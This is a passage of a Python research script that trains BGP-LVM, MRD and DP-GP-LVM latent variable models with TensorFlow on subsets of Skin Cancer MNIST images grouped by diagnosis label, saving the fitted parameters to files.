# Load randomised data for specific label pair if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
# not isfile(mrd_fully_independent_results_file),
# not isfile(gpdp_mask_results_file),
not isfile(gpdp_results_file)]):
two_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/two_conditions_data_{}_{}.npy'.format(label_1, label_2)
if isfile(two_conditions_data_file):
# Read numy file of randomised data.
two_groups_images = np.load(two_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
# Update number of samples if specific label does not have enough.
num_samples = 100
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
# Combine into [num_samples x 128] data.
two_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]]))
assert two_groups_images.shape[0] == num_samples, 'Number of subsampled observations is not equal.'
assert two_groups_images.shape[1] == 128, \
'Number of pixels does not match expected number of 64 for each group.'
# Save randomised data.
np.save(two_conditions_data_file, two_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(two_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {})'.format(label_1, label_2))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(s.run(model_training_objective)))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=two_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)
if not isfile(mrd_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 128, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(s.run(model_training_objective)))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=two_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)
# if not isfile(mrd_fully_independent_results_file):
# # Reset default graph before building new model graph. This speeds up script.
# tf.reset_default_graph()
# np.random.seed(1) # Random seed.
# # Define instance of fully independent MRD.
# model = mrd(views_train=[y_train[:, i:i + 1] for i in range(0, 128, 1)],
# num_inducing_points=num_inducing_points,
# num_latent_dims=num_latent_dimensions)
#
# model_training_objective = model.objective
# # Optimisation.
# model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
# loss=model_training_objective)
#
# with tf.Session() as s:
# # Initialise variables.
# s.run(tf.global_variables_initializer())
#
# # Training optimisation loop.
# start_time = time()
# print('\nTraining F.I. MRD:')
# for c in range(train_iter):
# s.run(model_opt_train)
# if (c % 100) == 0:
# print(' F.I. MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
# end_time = time()
# train_opt_time = end_time - start_time
# print('Final iter {:5}:'.format(c))
# print(' F.I. MRD: {}'.format(s.run(model_training_objective)))
# print('Time to optimise: {} s'.format(train_opt_time))
#
# # Get converged values as numpy arrays.
# ard_weights, noise_precision, signal_variance, inducing_input = \
# s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
# x_mean, x_covar = s.run(model.q_x)
#
# # Save results.
# print('\nSaving results to .npz file.')
# np.savez(mrd_fully_independent_results_file, original_data=two_groups_images, y_train=y_train,
# ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
# x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time)
if not isfile(gpdp_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. DP mask is default to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(s.run(model_training_objective)))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=two_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time)
# if not isfile(gpdp_mask_results_file):
# # Reset default graph before building new model graph. This speeds up script.
# tf.reset_default_graph()
# np.random.seed(1) # Random seed.
# # Define instance of DP-GP-LVM with DP mask of 64.
# model = dp_gp_lvm(y_train=y_train,
# num_inducing_points=num_inducing_points,
# num_latent_dims=num_latent_dimensions,
# truncation_level=truncation_level,
# mask_size=64)
#
# model_training_objective = model.objective
# # Optimisation.
# model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
# loss=model_training_objective)
#
# with tf.Session() as s:
# # Initialise variables.
# s.run(tf.global_variables_initializer())
#
# # Training optimisation loop.
# start_time = time()
# print('\nTraining DP-GP-LVM:')
# for c in range(train_iter):
# s.run(model_opt_train)
# if (c % 100) == 0:
# print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
# end_time = time()
# train_opt_time = end_time - start_time
# print('Final iter {:5}:'.format(c))
# print(' DP-GP-LVM: {}'.format(s.run(model_training_objective)))
# print('Time to optimise: {} s'.format(train_opt_time))
#
# # Get converged values as numpy arrays.
# ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
# s.run((model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
# model.assignments))
# x_mean, x_covar = s.run(model.q_x)
# w_1, w_2 = s.run(model.dp.q_alpha)
# gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
#
# # Save results.
# print('\nSaving results to .npz file.')
# np.savez(gpdp_mask_results_file, original_data=two_groups_images, y_train=y_train,
# ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
# x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
# gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
# q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time)
# Loop through each unique triplet of labels to create training data sets.
for label_1, label_2, label_3 in combinations(np.unique(labels), 3):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 35
num_latent_dimensions = 15
truncation_level = 20
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}'.format(label_1, label_2, label_3)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for specific label pair if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
three_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/two_conditions_data_{}_{}_{}.npy'.format(label_1, label_2, label_3)
if isfile(three_conditions_data_file):
# Read numy file of randomised data.
three_groups_images = np.load(three_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
# Update number of samples if specific label does not have enough.
num_samples = 100
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
# Combine into [num_samples x 192] data.
three_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]]))
assert three_groups_images.shape[0] == num_samples, 'Number of subsampled observations is not equal.'
assert three_groups_images.shape[1] == 192, \
'Number of pixels does not match expected number of 64 for each group.'
# Save randomised data.
np.save(three_conditions_data_file, three_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(three_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {}, {})'.format(label_1, label_2, label_3))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 192, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. DP mask is default to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=three_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
# Loop through each unique set of six labels to create training data sets.
for label_1, label_2, label_3, label_4, label_5, label_6 in combinations(np.unique(labels), 6):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 21
num_latent_dimensions = 25
truncation_level = 20
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}_{}_{}_{}'.format(label_1, label_2, label_3, label_4, label_5, label_6)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for specific label pair if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
six_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/six_conditions_data_{}_{}_{}_{}_{}_{}.npy'.format(label_1, label_2, label_3, label_4,
label_5, label_6)
if isfile(six_conditions_data_file):
# Read numy file of randomised data.
six_groups_images = np.load(six_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
group_4_images = image_data[np.equal(labels, label_4)]
group_5_images = image_data[np.equal(labels, label_5)]
group_6_images = image_data[np.equal(labels, label_6)]
# Update number of samples if specific label does not have enough.
num_samples = 70
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0], group_4_images.shape[0], group_5_images.shape[0],
group_6_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
rand_indices_4 = np.random.permutation(group_4_images.shape[0])
rand_indices_5 = np.random.permutation(group_5_images.shape[0])
rand_indices_6 = np.random.permutation(group_6_images.shape[0])
# Combine into [num_samples x 192] data.
six_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]],
group_4_images[rand_indices_4[:num_samples]],
group_5_images[rand_indices_5[:num_samples]],
group_6_images[rand_indices_6[:num_samples]]))
assert six_groups_images.shape[0] == num_samples, 'Number of subsampled observations is not equal.'
assert six_groups_images.shape[1] == 384, \
'Number of pixels does not match expected number of 64 for each group.'
# Save randomised data.
np.save(six_conditions_data_file, six_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(six_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {}, {}, {}, {}, {})'.format(label_1, label_2, label_3, label_4, label_5,
label_6))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 384, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(gpdp_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of DP-GP-LVM. DP mask is default to 1.
model = dp_gp_lvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions,
truncation_level=truncation_level)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining DP-GP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' DP-GP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' DP-GP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input, assignments = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input,
model.assignments))
x_mean, x_covar = s.run(model.q_x)
w_1, w_2 = s.run(model.dp.q_alpha)
gamma_atoms, alpha_atoms, beta_atoms = s.run(model.dp_atoms)
# Save results.
print('\nSaving results to .npz file.')
np.savez(gpdp_results_file, original_data=six_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, assignments=assignments, x_mean=x_mean, x_covar=x_covar,
gamma_atoms=gamma_atoms, alpha_atoms=alpha_atoms, beta_atoms=beta_atoms,
q_alpha_w1=w_1, q_alpha_w2=w_2, train_opt_time=train_opt_time, final_cost=final_cost)
# Loop through each unique set of all labels to create training data sets. This is only one set [0, 6].
for label_1, label_2, label_3, label_4, label_5, label_6, label_7 in combinations(np.unique(labels), 7):
# May need to update variational parameter sizes to avoid GPU memory overflow.
num_inducing_points = 20
num_latent_dimensions = 22
truncation_level = 25
# Define file path for results.
dataset_str = 'skin_cancer_mnist_{}_{}_{}_{}_{}_{}_{}'.format(label_1, label_2, label_3, label_4, label_5,
label_6, label_7)
bgplvm_results_file = RESULTS_FILE_NAME.format(model='bgplvm',
dataset=dataset_str)
mrd_results_file = RESULTS_FILE_NAME.format(model='mrd',
dataset=dataset_str)
gpdp_results_file = RESULTS_FILE_NAME.format(model='dp_gp_lvm',
dataset=dataset_str)
# Load randomised data for specific label pair if any of the model results do not exist.
if any([not isfile(bgplvm_results_file),
not isfile(mrd_results_file),
not isfile(gpdp_results_file)]):
seven_conditions_data_file = DATA_PATH + \
'skin_cancer_mnist/seven_conditions_data_{}_{}_{}_{}_{}_{}_{}.npy'.format(label_1, label_2, label_3,
label_4, label_5, label_6,
label_7)
if isfile(seven_conditions_data_file):
# Read numy file of randomised data.
seven_groups_images = np.load(seven_conditions_data_file)
else:
group_1_images = image_data[np.equal(labels, label_1)]
group_2_images = image_data[np.equal(labels, label_2)]
group_3_images = image_data[np.equal(labels, label_3)]
group_4_images = image_data[np.equal(labels, label_4)]
group_5_images = image_data[np.equal(labels, label_5)]
group_6_images = image_data[np.equal(labels, label_6)]
group_7_images = image_data[np.equal(labels, label_7)]
# Update number of samples if specific label does not have enough.
num_samples = 65
num_samples = min(num_samples, group_1_images.shape[0], group_2_images.shape[0],
group_3_images.shape[0], group_4_images.shape[0], group_5_images.shape[0],
group_6_images.shape[0], group_7_images.shape[0])
# Randomly permute observations.
np.random.seed(1) # Random seed.
rand_indices_1 = np.random.permutation(group_1_images.shape[0])
rand_indices_2 = np.random.permutation(group_2_images.shape[0])
rand_indices_3 = np.random.permutation(group_3_images.shape[0])
rand_indices_4 = np.random.permutation(group_4_images.shape[0])
rand_indices_5 = np.random.permutation(group_5_images.shape[0])
rand_indices_6 = np.random.permutation(group_6_images.shape[0])
rand_indices_7 = np.random.permutation(group_7_images.shape[0])
# Combine into [num_samples x 448] data.
seven_groups_images = np.hstack((group_1_images[rand_indices_1[:num_samples]],
group_2_images[rand_indices_2[:num_samples]],
group_3_images[rand_indices_3[:num_samples]],
group_4_images[rand_indices_4[:num_samples]],
group_5_images[rand_indices_5[:num_samples]],
group_6_images[rand_indices_6[:num_samples]],
group_7_images[rand_indices_7[:num_samples]]))
assert seven_groups_images.shape[0] == num_samples, 'Number of subsampled observations is not equal.'
assert seven_groups_images.shape[1] == 448, \
'Number of pixels does not match expected number of 64 for each group.'
# Save randomised data.
np.save(seven_conditions_data_file, seven_groups_images)
# Normalise data to zero mean and unit variance.
scaler = StandardScaler()
y_train = scaler.fit_transform(seven_groups_images)
num_samples, num_output_dimensions = y_train.shape
# Print info.
print('\nSkin Cancer MNIST Data:')
print(' Total number of observations (N): {}'.format(num_samples))
print(' Total number of output dimensions (D): {}'.format(num_output_dimensions))
print(' Diagnosis labels: ({}, {}, {}, {}, {}, {}, {})'.format(label_1, label_2, label_3, label_4, label_5,
label_6, label_7))
# Define instance of necessary model.
if not isfile(bgplvm_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
model = bgplvm(y_train=y_train,
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining BGP-LVM:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' BGP-LVM opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' BGP-LVM: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(bgplvm_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
x_u=inducing_input, x_mean=x_mean, x_covar=x_covar, train_opt_time=train_opt_time,
final_cost=final_cost)
if not isfile(mrd_results_file):
# Reset default graph before building new model graph. This speeds up script.
tf.reset_default_graph()
np.random.seed(1) # Random seed.
# Define instance of MRD with known views.
model = mrd(views_train=[y_train[:, i:i + 64] for i in range(0, 448, 64)],
num_inducing_points=num_inducing_points,
num_latent_dims=num_latent_dimensions)
model_training_objective = model.objective
# Optimisation.
model_opt_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(
loss=model_training_objective)
with tf.Session() as s:
# Initialise variables.
s.run(tf.global_variables_initializer())
# Training optimisation loop.
start_time = time()
print('\nTraining MRD:')
for c in range(train_iter):
s.run(model_opt_train)
if (c % 100) == 0:
print(' MRD opt iter {:5}: {}'.format(c, s.run(model_training_objective)))
end_time = time()
train_opt_time = end_time - start_time
final_cost = s.run(model_training_objective)
print('Final iter {:5}:'.format(c))
print(' MRD: {}'.format(final_cost))
print('Time to optimise: {} s'.format(train_opt_time))
# Get converged values as numpy arrays.
ard_weights, noise_precision, signal_variance, inducing_input = \
s.run(
(model.ard_weights, model.noise_precision, model.signal_variance, model.inducing_input))
x_mean, x_covar = s.run(model.q_x)
# Save results.
print('\nSaving results to .npz file.')
np.savez(mrd_results_file, original_data=seven_groups_images, y_train=y_train,
ard_weights=ard_weights, noise_precision=noise_precision, signal_variance=signal_variance,
